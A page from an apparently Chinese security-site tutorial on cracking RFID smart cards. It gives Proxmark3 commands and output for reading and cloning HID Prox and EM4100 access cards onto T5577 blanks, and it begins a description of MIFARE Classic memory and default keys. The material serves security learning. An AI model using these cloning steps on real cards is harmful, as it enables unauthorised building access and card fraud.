欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

智能卡破解入门二三事

来源:本站整理 作者:佚名 时间:2017-08-18 TAG: 我要投稿
Valid HID Prox ID Found! 
我们很清楚这是一张Prox 卡,如果需要将当前卡系统从 HID Prox 升级到 HID iCLASS 凭证,就需要特殊指令,我们现在已经知道标签ID(2004263f88),但我可以输入lf hid fskdemod指令读取智能卡(按下PM3上的按钮停止扫描)
proxmark3> lf hid fskdemod 
#db# TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132                            
#db# Stopped
该ID标签(19)以及卡ID(8132)的编码,你可以在线使用韦根协议(26位)计算器检查一下。这就意味着你需要了解数据并克隆到卡上(写入到卡本身)。
大多数低频电子标签没有任何复杂的认证方案或任何防止重放攻击的保护,所以扫描现有的智能卡,并克隆一张,并不是一件难事。使用高功率读卡器,可以在距离较远的位置窃取RFID电子标签。
我现在已经知道标签ID,现在需要一张空白的RFID卡,我们可以克隆标签ID。最好是t5577卡,它可以复制多种低频智能卡,包括这里讨论的两个(HID Prox 卡,EM41000卡)。

我已经了解到标签ID,那么就可以很轻松的克隆一张卡
proxmark3> lf hid clone 2004263f88 
Cloning tag with ID 2004263f88 
#db# DONE!
现在T5577卡电子标签应该与被克隆卡标签一致,成功了!!
除了读写操作之外,PM3还能够模拟RFID电子标签,但可能没有你想象的那么直观,你需要将计算机连接到PM3上,并执行一些指令,这对渗透测试者有帮助,但读写操作适用于绝大多数使用者。
EM4100
EM4100卡不像HID Prox 卡那样常见,但不代表它不会出现,PM3功能同样适用于它。

我们继续使用lf搜索命令
proxmark3> lf search 
#db# DownloadFPGA(len: 42096)
Reading 30000 bytes from device memory 
Data fetched 
Samples @ 8 bits/smpl, decimation 1:1 
NOTE: some demods output possible binary 
  if it finds something that looks like a tag
False Positives ARE possible 
Checking for known tags: 
EM410x pattern found: 
EM TAG ID      : 8800180E55 
Unique TAG ID  : 11001870AA 
Possible de-scramble patterns 
HoneyWell IdentKey { 
DEZ 8          : 01576533 
DEZ 10         : 0001576533 
DEZ 5.5        : 00024.03669 
DEZ 3.5A       : 136.03669 
DEZ 3.5B       : 000.03669 
DEZ 3.5C       : 024.03669 
DEZ 14/IK2     : 00584117128789 
DEZ 15/IK3     : 000073016045738 
DEZ 20/ZK      : 01010000010807001010 
}
Other          : 03669_024_01576533 
Pattern Paxton : 2284604501 [0x882C4C55] 
Pattern 1      : 4457436 [0x4403DC] 
Pattern Sebury : 3669 24 1576533  [0xE55 0x18 0x180E55] 
Valid EM410x ID Found! 
这是一张EM4100卡,我可以使用更多的EM4100 RFID指令,读取标签ID
proxmark3> lf em4x em410xdemod 1
#db# DownloadFPGA(len: 42096)
#db# EM TAG ID: 8800180e55 - (03669_024_01576533)
获取标签ID之后,写入到一张T5577卡中
proxmark3> lf em4x em410xwrite 8800180e55 1 
Writing T55x7 tag with UID 0x8800180e55 (clock rate: 64)
#db# Started writing T55x7 tag ...
#db# Clock rate: 64
#db# Tag T55x7 written with 0xffc62000e20ea94e
大多数低频RFID电子标签破解适用于刚入门的新手,你仅需要了解读/写/克隆/仿真的玩法。
接下来,我们将看看一张更复杂但最终被破解的智能卡,MIFARE Classic协议的NFC卡(以下简称MIFARE卡)。
MIFARE Classic
NFCA协议是兼容MifareClassic 协议的, 我们可以通过NfcA在android的相关类来处理给予MifareClassic 的RFID卡。MIFARE 卡应用很广泛,它应用的领域也大不相同,如公交卡、干洗店洗衣卡、身份证,很不幸的一点就是,这样的卡也会被破解。
一般来说,给予MifareClassic的射频卡,一般内存大小有3种:
1K: 16个分区(sector),每个分区4个块(block),每个块(block) 16个byte数据
2K: 32个分区,每个分区4个块(block),每个块(block) 16个byte数据
4K:64个分区,每个分区4个块(block),每个块(block) 16个byte数据
 对于所有基于MifareClassic的卡来说,每个区最后一个块叫Trailer,16个byte, 主要来存放读写该区的key,可以有A,B两个KEY,每个key长6byte,默认的key一般是FF 或 0,最后一个块的内存结构如下:
Block 0  Data 16bytes
Block 1  Data 16 bytes
Block 2  Data 16 bytes
Block 3  Trailer 16 bytes
 Trailer:
Key A: 6 bytes

上一页  [1] [2] [3] [4] [5]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载